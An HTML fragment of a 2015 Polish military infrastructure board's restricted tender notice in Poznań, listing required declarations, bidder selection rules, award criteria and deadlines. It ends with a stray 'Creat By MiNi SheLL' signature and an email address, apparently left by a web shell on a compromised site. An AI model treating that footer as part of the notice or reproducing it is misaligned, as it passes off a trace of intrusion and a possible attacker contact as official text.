<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie o spełnianiu warunków udziału w postępowaniu - załącznik nr  2 
do ogłoszenia
Dla osób niebędących etatowymi pracownikami Wykonawcy należy załączyć zobowiązanie do współpracy - załącznik nr 6 do ogłoszenia
oświadczenie Wykonawcy dotyczące posiadania uprawnień oraz spełniania wymogów ustawy o ochronie informacji niejawnych przez osoby odpowiedzialne za realizację zamówienia - załącznik nr 5 do ogłoszenia;
4)  oświadczenie Wykonawcy o spełnianiu wymogów przepisów o ochronie informacji niejawnych - załącznik nr 7 do ogłoszenia (dotyczy Wykonawcy realizującego zadanie samodzielnie) lub załącznik nr 7a do ogłoszenia (dotyczy Wykonawcy realizującego zadanie w ramach konsorcjum firm)
pełnomocnictwo:
            a) dla osoby podpisującej ofertę, do podejmowania zobowiązań w imieniu Wykonawcy, (jeżeli reprezentuje go pełnomocnik) lub w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia, o ile nie wynika ono z przepisów prawa lub innych dokumentów,
 b) w przypadku podpisania wniosku i opatrzenia dokumentów klauzulą za zgodność 
z oryginałem przez osobę inną niż wymieniona w dokumencie rejestrowym, a reprezentującą wykonawcę.
Zobowiązanie podmiotu udostępniającego zasoby - załącznik nr 11 do ogłoszenia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 20.</p>
<p class="bold">Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu</p>
<p>Zamawiający do składania ofert zaprosi nie mniej niż 5, nie więcej niż 20 Wykonawców.
Jeżeli liczba Wykonawców, którzy spełnią warunki udziału w postępowaniu, będzie mniejsza niż minimalna określona w ogłoszeniu, Zamawiający zaprosi do złożenia ofert wszystkich Wykonawców, którzy spełnią warunki udziału w postępowaniu.
W przypadku gdy do przedmiotowego postępowania wpłynie więcej niż 20 wniosków, dodatkowej ocenie punktowej podlegać będzie doświadczenie Wykonawcy 
(o charakterze, złożoności i zakresie podobnym do przedmiotu zamówienia), wynikające ze złożonego wykazu wykonanych zamówień (załącznik nr 10). Za każde należycie wykonane zadanie (ponad wymagane minimum - zgodnie z Rozdziałem VIII pkt. 2) Wykonawca otrzyma dodatkowo 1 punkt (maksymalnie uzyskać można 10 punktów).</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - termin realizacji - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia zmian postanowień umowy w zakresie,  określonym w § 13 Projektu umowy, który będzie stanowić część II SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wzipoznan.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojskowy Zarząd Infrastruktury
ul Kościuszki 92/98
61-716 Poznań, budynek nr 3 pok. nr 23/24.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.08.2015 godzina 11:00, miejsce: Wojskowy Zarząd Infrastruktury
ul Kościuszki 92/98
61-716 Poznań, budynek nr 3 pok. nr 5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com